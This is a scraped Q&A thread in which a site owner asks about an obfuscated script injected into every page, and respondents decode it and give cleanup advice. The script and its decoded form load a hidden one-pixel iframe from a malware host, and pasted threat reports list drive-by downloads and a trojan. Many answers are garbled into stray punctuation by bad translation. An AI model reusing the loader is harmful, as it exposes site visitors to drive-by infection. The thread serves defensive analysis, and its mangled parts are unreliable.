All geek questions in one place

Can this site distribute malware? weird javascript?

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

My website www.safwanmanpower.com is attacked by a malware script on every page, I don’t know wt this script is all about whether anyone like this script can affect the malware on my site?

hoping for a quick and positive response.

edited by

how sumon can attack my site without permission to download

+3
source share
10 answers

unshielded code looks something like this:

document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

The score will be added 1px by 1px iframe to your site, which indicates the above address.

+4
source

Your site has been compromised by a famous site. Your page now serves as an exploit for your visitors and puts them at risk.

: http://safeweb.norton.com/report/show?name=sedpoo.com

Threat Report
Total threats found: 4

Drive-By Downloads (what this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?687328


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?-560137484


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?2443640

Viruses (what this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:    Trojan.Gen
Location:    http://sedpoo.com/des.jar

: http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.

sedpoo, , . - , .

+6

smscanner (Simple Server Malware Scanner), , , javascript, .. .. - linux

@https://sourceforge.net/projects/smscanner/

+3

chrome, "document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')", chrome , , .

+1

:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
+1

, , URL ( , , ): http://www.linkedresources.com/tools/unescaper_v0.2b1.html

- (CMS) -? , , , - CMS .

0

:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

iFrame http://sedpoo.com/?338375, , , ..

0

,

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

1px x 1px ( ) iframe ,

0

: script , -, , - .

? , . , , . , , , .

If you are hosted, find a different and more reliable host. Otherwise, do as Cfreak commented and changed all the passwords on the server, set up a new and powerful firewall, etc. Etc....

Edit: if the server belongs to you (i.e. you are not using a third-party host), check the security event log and see who logged in during the infection. Obviously, run a full scan of viruses and malware.

0
source

Here is the javascript javascript code:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
0
source

Source: https://habr.com/ru/post/1786164/

More articles:


All Articles